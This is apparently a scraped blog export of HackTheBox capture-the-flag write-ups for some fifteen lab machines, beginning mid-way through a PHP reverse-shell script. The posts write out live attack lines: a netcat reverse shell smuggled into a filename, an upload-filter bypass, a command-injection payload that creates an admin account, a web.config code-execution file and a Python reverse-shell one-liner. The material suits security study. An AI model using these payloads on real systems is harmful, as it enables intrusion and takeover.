READ\u0026#34;); $input = fread($pipes[1], $chunk_size); if ($debug) printit(\u0026#34;STDOUT: $input\u0026#34;); fwrite($sock, $input); } // If we can read from the process\u0026#39;s STDERR // send data down tcp connection if (in_array($pipes[2], $read_a)) { if ($debug) printit(\u0026#34;STDERR READ\u0026#34;); $input = fread($pipes[2], $chunk_size); if ($debug) printit(\u0026#34;STDERR: $input\u0026#34;); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); // Like print, but does nothing if we\u0026#39;ve daemonised ourself // (I can\u0026#39;t figure out how to redirect STDOUT like a proper daemon) function printit ($string) { if (!$daemon) { print \u0026#34;$string\\n\u0026#34;; } } ?\u0026gt; we will change the ip and port accordingly\nand then we add this to the top line\nGIF89a;\nfollowed by renaming the file from .php to .php.png and then we upload this file\nok cool now we have our shell\nlet's upgrade the shell with some magic like how we do\npython -c \u0026#39;import pty;pty.spawn(\u0026#34;/bin/bash\u0026#34;)\u0026#39;\nstty -a ; for getting the col and row sizes\nctrl+z to suspend the process\nfollowed with\nstty raw -echo;fg and hit the enter button twice\nset cols and rows with info from stty -a\nalright now moving on we see that our user is apache\nok cool our privs are still low, let's escalate them and pwn the box\nwe first start a python server on our machine where linpeas is located, then from the victim's machine we use a curl command to grab the file\ncurl http://ip:port/linpeas.sh -o linpeas.sh\nand then we change the permission\nchmod +x linpeas.sh\nthen we run it with ./linpeas.sh\nok let's check out if there is anything interesting from the scan\naand there was nothing interesting at all because most of the permissions are restricted for the user we are on.\nlet's search dirs manually and see if we come across anything interesting\noh damn so there is a cron job being run with this user called guly\nlet's 
check it out\nso every 3 minutes the check_attack.php file runs\nok so this basically executes any php file that is in the uploads dir, and checks if it is a potential attack or not\nwhat if we put a rev shell here?\nlet's do that\nnavigate to that dir and type this\ntouch -- \u0026#39;;nc -c bash 10.10.14.30 4321;.php\u0026#39;\nnow let's wait\naaand we have our connect\nlet's try sudo -l\nok so we have permissions to this file called changename.sh ?\nlet's check it out\nThe regex here allows us to use normal characters and other symbols like /, \\ -, _ ,and space\nlet's try /bin/bash\nand there we go, root access now time to grab the flags\nuser flag\nroot flag\n","date":"24 August 2024","externalUrl":null,"permalink":"/ctf-writeups/networked/","section":"CTF Writeups","summary":"","title":"Networked","type":"ctf-writeups"},{"content":" Sunday # Overview # OS: Solaris IP: 10.10.10.76 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # pwned box sunday, learnt to do username enumeration for finger service and crack hash with john.\nEnumeration # ok so finger seems to be running, let's start with enumerating for users\nwe will use this pentest monkey script for the enumeration\nhttps://pentestmonkey.net/tools/user-enumeration/finger-user-enum\nwe got sammy and sunny as the users after doing some user enum\nExploitation # let's now use these creds to access ssh\nguessing the box name sunday as the password works\nnavigating to /backup we find two hashes, let's break them with john\nwe will use this to identify the hash\nhttps://hashes.com/en/tools/hash_identifier\nand we got the pass as cooldude!\nand we are done, we have our root shell\nuser flag\nroot flag\n","date":"24 August 2024","externalUrl":null,"permalink":"/ctf-writeups/sunday/","section":"CTF Writeups","summary":"","title":"Sunday","type":"ctf-writeups"},{"content":" Valentine # Overview # OS: Linux IP: 10.10.10.79 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # tmux session + heartbleed 
exploit.\nEnumeration # nmap scan result\ndirbuster result\ngoing to dev we get these files\nand this hype key\nhomepage\nencoder\ndecoder\nnmap vuln scan\nVulnerabilities # I validated this step using the evidence below before moving forward in the chain.\nwe will be using the heartbleed exploit, the omg.jpg we found earlier seemed to have been hinting at this exploit also\nExploitation # This page has the code in hex, let's convert it to plaintext for us to read using this\nhttps://www.rapidtables.com/convert/number/hex-to-ascii.html\nnice, it turned out to be an RSA private key\nlet's get the heartbleed script from here\ngit clone https://gist.github.com/10174134.git\nnow let's run it\nsomeone had tried to encode this text, let's decode it with the tool they have on their site\nnice now let's try this as our ssh pass for users valentine, heart, hype, etc\naaand we are in\nnow we will probably have to escalate our privileges\nafter using a simple python server paired with wget to get linpeas running on our victim's system\nwe are able to identify that tmux is running, that's great we can use this to elevate our priv\ntmux -S /.devs/dev_sess\ntyping this connects us to the session and we can now grab our flags\nroot flag\nuser flag\n","date":"24 August 2024","externalUrl":null,"permalink":"/ctf-writeups/valentine/","section":"CTF Writeups","summary":"","title":"Valentine","type":"ctf-writeups"},{"content":" Blocky # Overview # OS: Linux IP: 10.10.10.37 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # set up JD GUI for decompiling java code, checked the .class object got credentials and then got access with sudo -l, priv esc was easy it was just sudo -l followed with sudo su.\nEnumeration # nmap scan results\nlet's add blocky.htb to our /etc/hosts file so we can view the homepage\ndirbusting results\nphpMyadmin login page\nwordpress login\n/plugins/\nok interesting we have 2 jar files with us\nwe have this file with us on going through the rar file, let's 
view it using JD GUI\nhttp://java-decompiler.github.io/ we get our .rpm file from here\nnow\nconverting to debian file with alien command\n└─$ sudo alien jd-gui*.rpm\nfollowed by this for installing\nsudo dpkg -i jd-gui*.deb\nand now we can view our class file\nalright so these are our creds, we will use these in the exploitation stage\n8YsqfCTnvxAUeduzjNSXe22\nExploitation # ok so htb had also asked us a question in the first step which was what the username is through enumeration? the only users we were able to find were root and a guy called notch.\nlet's try using these creds with ssh\nalright great we got in with notch but root failed\nlet's check notch's permissions\nwow we can run all commands, let's upgrade to a root shell and grab our flags\nroot flag\nuser flag\n","date":"23 August 2024","externalUrl":null,"permalink":"/ctf-writeups/blocky/","section":"CTF Writeups","summary":"","title":"Blocky","type":"ctf-writeups"},{"content":" Netmon # Overview # OS: Windows IP: 10.10.10.152 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # normal access through rce exploit and config file investigation.\nEnumeration # nmap scan results\nalright so ftp seems to be running and that too with anon access, let's check this out later\nhomepage\nwe tried these default creds, but they did not seem to work\ndirbusting\ndirsearch -u http://10.10.10.152/ -e php,txt,html -x 403,404 -t 50\nnothing useful that we can access\nVulnerabilities # ftp with anon access\nExploitation # Accessing the ftp server anonymously\nUser Flag\nplease ignore the failed attempts with cat and type, I forgot that get should be used here\nwe know that by default the file path for the config files for this service would be this\non visiting this location we come across these files\nwe were getting an error earlier while trying to retrieve the file with the get command but we resolve this by changing the mode to binary and then trying it out, we just have to type binary once per ftp session to 
change the download mode from ascii to binary apparently.\nanyways let's scan through the contents of the file\nand there we go, in the first few lines we find the admin user and pass\nlet's use this to authenticate\nprtgadmin:PrTg@dmin2018\nok so on trying these creds we did not get access but if we look at the config files again\nwe see that damn there was another update that happened in the year after, so let's try changing the 2018 to 2019\nannnd we are in, now let's check for any vulnerabilities for this version of prtg network monitor.\nhttps://codewatch.org/2018/06/25/prtg-18-2-39-command-injection-vulnerability/\nwe find this blogpost that tells us that we can execute commands through the notification parameter as they are directly sent to the powershell without any sanitization.\nwe go to\nSetup \u0026gt; Account Settings \u0026gt; Notifications. And click “+” sign to the right side.\nLeaving all the options as they are, go to “Execute Program” and here we can inject commands in the “Parameter” field. This is my payload\nlet's use this payload\ntest.txt;net user anon p3nT3st! 
/add;net localgroup administrators anon /add\nwhich i got from this blog\nhttps://medium.com/@preethambomma/netmon-hackthebox-writeup-fe6e9f1ff5b0\nlets get psexec from here\nhttps://github.com/fortra/impacket/blob/master/examples/psexec.py\nnow lets use this to authenticate\nunfortunately i kept getting this error but it is supposed to have worked, anyways i am going to try a different method\nlets use this cve exploit\nhttps://github.com/A1vinSmith/CVE-2018-9276\nand we are finally in\nRoot Flag\n","date":"20 August 2024","externalUrl":null,"permalink":"/ctf-writeups/netmon/","section":"CTF Writeups","summary":"","title":"Netmon","type":"ctf-writeups"},{"content":" Arctic # Overview # OS: Windows IP: 10.10.10.11 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # used a local exploit , certutil and hashcat done w/o ms.\nEnumeration # nmap scan results\nhomepage\nwe find the admin page\nVulnerabilities # ok so they are using CFIDE . lets look up an exploit for this\nhttps://www.exploit-db.com/exploits/50057\nDirectory traversal exploit\nhttps://www.exploit-db.com/exploits/14641\nExploitation # without metasploit lets use the 2010 directory traversal exploit\nlets visit the directory specified\nok so with this we have the password but its encrypted using a hash value ,\nlets identify the hash first\nhmm alright , lets use hashcat now\nand there we go , we got the password , now lets access the admin page\nwe find this scheduled task page , where we can possibly upload our payload\nlets create a jsp payload with msfvenom and upload it\nstarting a simple server\nnow lets grab our file\non visiting index we find this\nand there we go we got our shell . 
now time for some privilege escalation soon\nthis is our systems information\nHost Name: ARCTIC OS Name: Microsoft Windows Server 2008 R2 Standard OS Version: 6.1.7600 N/A Build 7600 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Server OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization:\nProduct ID: 55041-507-9857321-84451 Original Install Date: 22/3/2017, 11:09:45 �� System Boot Time: 6/8/2024, 6:24:51 �� System Manufacturer: VMware, Inc. System Model: VMware Virtual Platform System Type: x64-based PC Processor(s): 1 Processor(s) Installed. [01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2595 Mhz BIOS Version: Phoenix Technologies LTD 6.00, 12/11/2020 Windows Directory: C:\\Windows System Directory: C:\\Windows\\system32 Boot Device: \\Device\\HarddiskVolume1 System Locale: el;Greek Input Locale: en-us;English (United States) Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul Total Physical Memory: 6.143 MB Available Physical Memory: 5.097 MB Virtual Memory: Max Size: 12.285 MB Virtual Memory: Available: 11.288 MB Virtual Memory: In Use: 997 MB Page File Location(s): C:\\pagefile.sys Domain: HTB Logon Server: N/A Hotfix(s): N/A Network Card(s):\n1 NIC(s) Installed. 
[01]: Intel(R) PRO/1000 MT Network Connection Connection Name: Local Area Connection DHCP Enabled: No IP address(es) [01]: 10.10.10.11\nlets put this in a local windows exploit suggester\nlets use ms10-059\nwe will upload this with simple serv and execute on the target's machine\nlets execute it now\nok lets get our upgraded shell now\nand now we can grab our flags\nroot flag\nuser flag\n","date":"28 July 2024","externalUrl":null,"permalink":"/ctf-writeups/arctic/","section":"CTF Writeups","summary":"","title":"Arctic","type":"ctf-writeups"},{"content":" Bastard # Overview # OS: Windows IP: 10.10.10.9 Difficulty: Medium Platform: HackTheBox OSCP: No Lists: N/A Summary # Exploited site made using drupal , used an exploit that allowed remote code exec , got in and then did priv esc with the ms10-059 chimichurri exploit.\nEnumeration # nmap scan results\nhomepage\nChangelog.txt which is a default drupal file\nfor some reason dirbuster and gobuster both seem to be acting up with this box , lets try dirsearch as a final resort\nVulnerabilities # So for Drupal 7.54 we have the following vulns available\nwe could go with drupalgeddon2 but it was released on 13th april 2018 , which is much later than the box’s release date 18 March,2017.\nso lets try looking for an exploit before or nearer to that date\nhad to search just Drupal this time for a wider list\nthis is probably the intended exploit so lets use this\n2017-03-09\nExploitation # lets make the following changes to the exploit\nnote: make sure to do sudo apt install php-curl before running the script\nthats strange , oh i forgot to change the rest endpoint as well , gobuster gave us the /rest dir earlier and on visiting it we seem to have activated the endpoint.\nlets modify the script now\nwe got our file muq.php uploaded , now lets try for a rev shell\nnow time to run the nc\nand we are in\nso systeminfo gives us this\nHost Name: BASTARD OS Name: Microsoft Windows Server 2008 R2 Datacenter OS Version: 6.1.7600 N/A Build 7600 
OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Server OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization:\nProduct ID: 55041-402-3582622-84461 Original Install Date: 18/3/2017, 7:04:46 �� System Boot Time: 11/8/2024, 6:06:34 �� System Manufacturer: VMware, Inc. System Model: VMware Virtual Platform System Type: x64-based PC Processor(s): 2 Processor(s) Installed. [01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2445 Mhz [02]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2445 Mhz BIOS Version: Phoenix Technologies LTD 6.00, 12/11/2020 Windows Directory: C:\\Windows System Directory: C:\\Windows\\system32 Boot Device: \\Device\\HarddiskVolume1 System Locale: el;Greek Input Locale: en-us;English (United States) Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul Total Physical Memory: 2.047 MB Available Physical Memory: 1.594 MB Virtual Memory: Max Size: 4.095 MB Virtual Memory: Available: 3.621 MB Virtual Memory: In Use: 474 MB Page File Location(s): C:\\pagefile.sys Domain: HTB Logon Server: N/A Hotfix(s): N/A Network Card(s): 1 NIC(s) Installed. 
[01]: Intel(R) PRO/1000 MT Network Connection Connection Name: Local Area Connection DHCP Enabled: No IP address(es) [01]: 10.10.10.9\nlets use this with our windows exploit suggester and see if we find something sweet\nlets try using this exploit\nwe will get this on our machine with a python serv and use it to get us a rev shell\nand now we grab our flags\n","date":"28 July 2024","externalUrl":null,"permalink":"/ctf-writeups/bastard/","section":"CTF Writeups","summary":"","title":"Bastard","type":"ctf-writeups"},{"content":" Bounty # Overview # OS: Windows IP: 10.10.10.93 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # modified web.config file that allows the upload of aspx files to upload an aspx reverse shell payload but shell is not stable.\nEnumeration # nmap scan\nhomepage\ndirbusting results\ntransfer.aspx\nVulnerabilities # transfer.aspx directory\nasp through webconfig https://soroush.me/blog/2014/07/upload-a-web-config-file-for-fun-profit/\nExploitation # lets see what all extensions we can upload to the server\nfirst lets send the upload action to a repeater\nnow lets create our payload\nlet this be our extensions.txt file\nwe send the request to the intruder and then add our payload\nhere we define the payload\nok so with this we can tell that the server accepts uploads with these extensions\nhttps://soroush.me/blog/2014/07/upload-a-web-config-file-for-fun-profit/\nthis config file allows us to upload asp files which could give us a shell so lets use this\n\u0026lt;?xml version=\u0026quot;1.0\u0026quot; encoding=\u0026quot;UTF-8\u0026quot;?\u0026gt;\n\u0026lt;configuration\u0026gt;\n\u0026lt;system.webServer\u0026gt;\n\u0026lt;handlers accessPolicy=\u0026quot;Read, Script, Write\u0026quot;\u0026gt;\n\u0026lt;add name=\u0026quot;web_config\u0026quot; path=\u0026quot;*.config\u0026quot; verb=\u0026quot;*\u0026quot; modules=\u0026quot;IsapiModule\u0026quot; scriptProcessor=\u0026quot;%windir%\\system32\\inetsrv\\asp.dll\u0026quot; 
resourceType=\u0026quot;Unspecified\u0026quot; requireAccess=\u0026quot;Write\u0026quot; preCondition=\u0026quot;bitness64\u0026quot; /\u0026gt;\n\u0026lt;/handlers\u0026gt;\n\u0026lt;security\u0026gt;\n\u0026lt;requestFiltering\u0026gt;\n\u0026lt;fileExtensions\u0026gt;\n\u0026lt;remove fileExtension=\u0026quot;.config\u0026quot; /\u0026gt;\n\u0026lt;/fileExtensions\u0026gt;\n\u0026lt;hiddenSegments\u0026gt;\n\u0026lt;remove segment=\u0026quot;web.config\u0026quot; /\u0026gt;\n\u0026lt;/hiddenSegments\u0026gt;\n\u0026lt;/requestFiltering\u0026gt;\n\u0026lt;/security\u0026gt;\n\u0026lt;/system.webServer\u0026gt;\n\u0026lt;/configuration\u0026gt;\n\u0026lt;!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!\n\u0026lt;%\nResponse.write(\u0026quot;-\u0026quot;\u0026amp;\u0026quot;-\u0026gt;\u0026quot;)\n' it is running the ASP code if you can see 3 by opening the web.config file!\nResponse.write(1+2)\nResponse.write(\u0026quot;\u0026lt;!-\u0026quot;\u0026amp;\u0026quot;-\u0026quot;)\n%\u0026gt;\n-\u0026gt; now lets upload this file on the server\nits displaying 3 , that means our web.config file is working properly\nnow we can go ahead and try getting a shell\nalright we have made our payload , now time to get it running on the victim's box\nsetting up our python server and netcat\nwe will now use certutil to get the exe payload\nand on uploading then refreshing the uploadedfiles/webconfig dir\nwe have our shell\n","date":"28 July 2024","externalUrl":null,"permalink":"/ctf-writeups/bounty/","section":"CTF Writeups","summary":"","title":"Bounty","type":"ctf-writeups"},{"content":" Brainfuck # Overview # OS: Linux IP: 10.10.10.17 Difficulty: Insane Platform: HackTheBox OSCP: No Lists: N/A Summary # wpscan, vigenere cipher, ssh2john, evolution, linpeas.\nEnumeration # nmap scan results\nhomepage\ninspecting the certificate\nwww.brainfuck.htb\nsup3rs3cr3t.brainfuck.htb\nadding these to our /etc/hosts 
file\nsup3rs3cr3t.brainfuck.htb\nwww.brainfuck.htb\nwpscan enumeration for wordpress sites\nlets get a list of vulnerabilities as well by giving the apikey using the api switch --api-token [apikey]\non checking the dev-update post we find the username as admin\nlets use wpscan to enumerate the users as well , using the enumerate-user flag\nVulnerabilities # lets check this one out\nExploitation # modifying the script with the credentials we got from our enumeration stage\nlets now save it as an html file\nhosting it with python\nlets visit our localhost now\nnow we should be logged in on revisiting the site [ what we just did was , we used a cookie that tells the browser that we are a logged in user and using that we were able to login as anyone including admin ]\nthe site seems to be hinting at smtp , so lets check that out\ndashboard\nok so we have the password being shown here for the user orestis , but its not really visible , lets see if we can do something about it by inspecting\norestis:kHGuERB29DNiNE —\u0026gt; our smtp creds\nok now that we have the creds , lets use Evolution\nnow after we are done with this , we go back to the homepage to be greeted with an authentication request.\nlets use the password we got earlier\non inspecting the mail we find these credentials\nlets use these details for the supersecretforum page we found earlier during enumeration.\norestis:kIEnnfEKJ#9UmdO\nok so this tells us that the ssh access now only uses keys , and the key is apparently being shared in a secret forum.\nlets check that forum out\nalright, so the messages seem to be encrypted\nso straight off the bat we notice that\nseems to be a signature , and judging by the same word length , these might be the same sentences.\nlets try cracking the cipher with this\nso right off we can tell that this might be a vernam cipher , lets try using this website to decode the key\nwe get the key as fuck my brain\nnow lets decrypt the forum using this key we got\nok so we got 
the link for the key , lets visit it\nfor some reason i keep getting this 404 not found page\nlets try grabbing it with this instead\nwget --no-check-certificate https://brainfuck.htb/8ba5aa10e915218697d1c658cdee0bb8/orestis/id_rsa\nalright so this seems to work now we check out the key\nwe have our RSA private key , but it is encrypted\nlets use ssh2john to put the RSA key in a crackable format\nnow lets give the crackthis file to john for decrypting\nusing john we got our key as 3poulakia!\nnow lets try logging in with ssh -i id_rsa orestis@brainfuck.htb\nlets try again but with changing the permissions before\nand we are in\nlets check the other files out as well\norestis@brainfuck:~$ cat output.txt Encrypted Password: 44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182\nso the root.txt file seems to have been encrypted using this\nahh we need to do some priv esc.\nlets use linpeas to perform a scan for some possible priv esc vectors\nwe first get linpeas.sh from https://github.com/peass-ng/PEASS-ng/releases/tag/20240811-aea595a1\nwe will now host it on a server using python for our box , as htb boxes dont usually have internet access\nlets use wget now\nwe have it now in our tmp folder , lets run it\nforgot to change our permissions first hah\nIn linpeas.sh, a RED/YELLOW box has a 95% chance at being a viable privesc vector.\nunder the exploit section we find a few to choose from\nlets go with this exploit\nwe got the exploit on our system\nlets unzip it\nand there we go , root access!\ngetting our root flag\n","date":"28 July 2024","externalUrl":null,"permalink":"/ctf-writeups/brainfuck/","section":"CTF Writeups","summary":"","title":"Brainfuck","type":"ctf-writeups"},{"content":" Cronos # Overview # 
OS: Linux IP: 10.10.10.13 Difficulty: Medium Platform: HackTheBox OSCP: No Lists: N/A Summary # learnt to perform dns enumeration , learnt how to use sql injection payloads , used linpeas to find a cron job running , ran a php rev shell through the cron job and pwned box CronOS.\nEnumeration # nmap results\nok so we can see that there is dns-nsid\nlets perform dns enum with nslookup\ndns enum\nWe will now check for zone transfer using the DIG command. DNS zone transfer, also known as DNS query type AXFR, is a process by which a DNS server passes a copy of part of its database to another DNS server. The portion of the database that is replicated is known as a zone.\nUSAGE- dig axfr @\u0026lt;DNS_IP\u0026gt; lets add these to our hosts file\ncronos and www.cronos\nns1.cronos.htb\nadmin.cronos.htb\ndirbusting\nconfig.php\nVulnerabilities # Exploitation # lets try getting past this login screen , we will try some sql payloads from a cheatsheet\nhttps://www.invicti.com/blog/web-security/sql-injection-cheat-sheet/\nthis one gets us in , and we are greeted with this welcome.php page\nlets try terminating the command and following it up with a basic cmd\nok damn so it works , lets try getting a rev shell\nwe got our netcat up\nok so this does not work , uhh lets check the requests that we are sending with burpsuite and see if we can do anything there\nok so 2 things are happening\nthere is some host condition and the code is being url encoded , lets try removing all that while preserving the encoding\nthis does not work , lets try another variation of the netcat command\nthis works and we now have our shell\nand there , we have our user flag grabbed right off the bat\ntime to do some privesc for getting root access\nwe go to the tmp folder and use wget to get linpeas from the python serv we started\nnow lets run linpeas\noops i forgot to upgrade the shell , we will do that after this\nthere we upgraded the shell, now lets check the linpeas result\nok so pwnkit seems to be an 
exploit for this, i have used it before and dont want to use it rn so lets look a bit more\nok so the orangish box tells us that this is 90% a priv esc vector , and it probably is because its a cron job being run with usr priv to create a file w root priv. we can use this to create our rev shell for us to get into\nalso the *s at the end lets put them on a cron decoder thing and see what it means\nhttps://crontab.guru/V\nso with this we can tell that the job is being run every minute\nnow lets visit this dir\nin the artisan folder lets put this php rev shell code\nhttps://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php\nchange accordingly\nthere we go , we have our shell now time to grab our root flag\n","date":"28 July 2024","externalUrl":null,"permalink":"/ctf-writeups/cronos/","section":"CTF Writeups","summary":"","title":"Cronos","type":"ctf-writeups"},{"content":" Devel # Overview # OS: Windows IP: 10.10.10.5 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # Uploaded reverse shell.aspx on ftp and exploited with metasploit+msfvenom + w/o metasploit ( local exploit sugg. 
setup inc ).\nEnumeration # nmap scan results\nhomepage\nExploitation w Metasploit + Msfvenom lets begin with accessing the ftp server as an anon\nlets check out the directory\nalright we will now try uploading a file here with the extension .aspx as its microsoft iis version 7.5\ncreating a reverse tcp shell script with msfvenom and then we upload it on the ftp server\nnow lets use metasploit to open a meterpreter session\nand we are in , lets enumerate now\nUsing the local exploit suggester\nwe just have to provide the exploit which session we want to run it on, after backgrounding the session\nThis returns us a list of exploits that we can run on the system\nwe will be using this client copy image one\nnice we have our shell , now lets grab our flags\nroot flag\nuser flag\nExploitation w/o Metasploit Setting up local exploit suggester\nwget https://bootstrap.pypa.io/pip/2.7/get-pip.py\npython2 -m pip install --user xlrd==1.1.0\npython2 windows-exploit-suggester.py --update\nwindows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt\nfollowed by gedit system.txt\n","date":"28 July 2024","externalUrl":null,"permalink":"/ctf-writeups/devel/","section":"CTF Writeups","summary":"","title":"Devel","type":"ctf-writeups"},{"content":"","date":"28 July 2024","externalUrl":null,"permalink":"/tags/insane/","section":"Tags","summary":"","title":"Insane","type":"tags"},{"content":" Nibbles # Overview # OS: Linux IP: 10.10.10.75 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # php reverse shell injection.\nEnumeration # nmap scan results\nhome page\nsource code\nnibbleblog directory\ndirbusting results\non visiting the content page , we are greeted with this\nlets check out the users file\nit seems like admin is the username\nwe were able to login to the admin page by guessing the password as nibbles haha\nVulnerabilities # nibbleblog 
v4.0.3\nfile injection multi/http/nibble_file_upload\nExploitation without metasploit on reading the exploit for nibbles that we found earlier , we can infer that it is trying to upload a php exploit through the image plugin\nlets try this\nthis is our reverse shell script , we will be uploading this through the image plugin\nafter uploading the file we visit\nhttp://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php?cmd=id\non visiting we get our reverse shell\nspawning bash\nupgrading our shell\non running sudo -l , we figure out that the user that we have can run a script with root privileges\nlets go to this path\nlets add our reverse shell in this script\nand there we go , we have a root shell now time to grab the flags\nour root flag\nour user flag\nExploitation with metasploit lets use the payload we found\nnow lets try accessing root\nwe will try upgrading our shell\nok great so this system has python3 lets spawn in our shell\n","date":"28 July 2024","externalUrl":null,"permalink":"/ctf-writeups/nibbles/","section":"CTF Writeups","summary":"","title":"Nibbles","type":"ctf-writeups"},{"content":" Optimum # Overview # OS: Windows IP: 10.10.10.8 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # pwned the box with an exploit , used simple http server mainly to host the files for download and done w metasploit.\nEnumeration # Nmap scan results\nhomepage\nVulnerabilities # https://www.exploit-db.com/exploits/39161\nExploitation w/o Metasploit lets first get our exploit file\nnow lets check the script and change our ip to our local one\nit says we need to be hosting a webserver with netcat , so lets do that\nnow lets store our netcat here as well to use along with the exploit\nwe make these files available via our simple httpserver\nsetting up our netcat acco. 
to the port we mentioned earlier\nnow on running this 2 or 3 times\npython 39161.py 10.10.10.8 80\nwe are able to get our shell\nwe got our user flag\nwe might need to do some privilege escalation for the root flag\nlets check the systems info.\nHost Name: OPTIMUM OS Name: Microsoft Windows Server 2012 R2 Standard OS Version: 6.3.9600 N/A Build 9600 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Server OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization:\nProduct ID: 00252-70000-00000-AA535 Original Install Date: 18/3/2017, 1:51:36 �� System Boot Time: 9/8/2024, 3:17:56 �� System Manufacturer: VMware, Inc. System Model: VMware Virtual Platform System Type: x64-based PC Processor(s): 1 Processor(s) Installed. [01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2445 Mhz BIOS Version: Phoenix Technologies LTD 6.00, 12/11/2020 Windows Directory: C:\\Windows System Directory: C:\\Windows\\system32 Boot Device: \\Device\\HarddiskVolume1 System Locale: el;Greek Input Locale: en-us;English (United States) Time Zone: (UTC+02:00) Athens, Bucharest Total Physical Memory: 4.095 MB Available Physical Memory: 3.527 MB Virtual Memory: Max Size: 5.503 MB Virtual Memory: Available: 4.971 MB Virtual Memory: In Use: 532 MB Page File Location(s): C:\\pagefile.sys Domain: HTB Logon Server: \\OPTIMUM Hotfix(s): 31 Hotfix(s) Installed. [01]: KB2959936 [02]: KB2896496 [03]: KB2919355 [04]: KB2920189 [05]: KB2928120 [06]: KB2931358 [07]: KB2931366 [08]: KB2933826 [09]: KB2938772 [10]: KB2949621 [11]: KB2954879 [12]: KB2958262 [13]: KB2958263 [14]: KB2961072 [15]: KB2965500 [16]: KB2966407 [17]: KB2967917 [18]: KB2971203 [19]: KB2971850 [20]: KB2973351 [21]: KB2973448 [22]: KB2975061 [23]: KB2976627 [24]: KB2977629 [25]: KB2981580 [26]: KB2987107 [27]: KB2989647 [28]: KB2998527 [29]: KB3000850 [30]: KB3003057 [31]: KB3014442 Network Card(s): 1 NIC(s) Installed. 
[01]: Intel(R) 82574L Gigabit Network Connection Connection Name: Ethernet0 DHCP Enabled: No IP address(es) [01]: 10.10.10.8 Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.\nrunning the local windows exploit suggester\nwe will use this one\nnow lets host it and download it on to our victim's machine\ngetting the root flag\nExploitation w Metasploit and we are in\nwe got our user flag\ntime to do some privilege escalation for the root flag\nwe will first run the local exploit suggester\naand now we have a bunch of exploits to choose from , lets go with the last one\n","date":"28 July 2024","externalUrl":null,"permalink":"/ctf-writeups/optimum/","section":"CTF Writeups","summary":"","title":"Optimum","type":"ctf-writeups"},{"content":" Sense # Overview # OS: OpenBSD IP: 10.10.10.60 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # Started box sense , used a vulnerability on the pfsense router to allow code injection with burpsuite, got a stable reverse shell with a python script and got the flags and learnt how to work around bad characters in a query.\nEnumeration # nmap scan results\ndirbusting results\nhomepage\nvisiting system users page\nVulnerabilities # pfsense exploit\nhttps://www.exploit-db.com/exploits/43560\nExploitation # ok now lets go to the homepage\nwith the information we gathered we know that the username is Rohit and the password is the default pass for a pfsense router which is ‘pfsense’.\nand we are greeted with this page, now lets check if there are any exploits and see how to execute if there is one present\nso on exploit db we found this command injection exploit\nok so this tells us that it is checking if the database is queues and then it url encodes the payload followed with pipelining to a shell.\nlets try this approach by modifying the requests with burpsuite\nwe pipeline our command injection to show on our shell that is listening using nc\non sending ls and 
whoami\nlets now make it so that it stores the output in a file\nwe dont get anything when we search for / lets see if the command is correct by checking with some other character.\nok so the command is fine , its just the character that is bad , lets check our environment variables.\nok nice , we see that the HOME variable points to / , we can make use of this\nby modifying our request like this\nwe are able to get a list of files\nwe have identified where our flags are located , all that is left is to actually retrieve them now\nlets modify the request for this again\nok so we cant just use cat like that apparently ,\nlets try getting a shell instead by executing a python script for opening a reverse shell\nwe will use this one from the reverse shell cheat sheet\npython -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\u0026quot;10.0.0.1\u0026quot;,1234))\nnow lets run this file\nand there we go , we have our shell now we can grab our flags\npwned\n","date":"28 July 2024","externalUrl":null,"permalink":"/ctf-writeups/sense/","section":"CTF Writeups","summary":"","title":"Sense","type":"ctf-writeups"},{"content":" Silo # Overview # OS: Windows IP: 10.10.10.82 Difficulty: Medium Platform: HackTheBox OSCP: No Lists: N/A Summary # odat , volatility , nishang shell , nmap script for sid bruteforce.\nEnumeration # nmap scan results\nVulnerabilities # Exploitation # lets download ODAT\nhttps://github.com/quentinhardy/odat\nso what im gonna do is clone this repo with git clone and try to directly run the odat.py file\nlets do this to fix it\npip3 uninstall crypto\npip3 uninstall pycrypto\npip3 install pycryptodome\nand it works now\nlets guess the sid first with this command\n└─$ python3 odat.py sidguesser -s 10.10.10.82 -p 1521\nok so when i used odat i was getting a bunch of false positives i dont know why\nlets try using an nmap script\nwe got our SID as XE\nok so when we check the options for password 
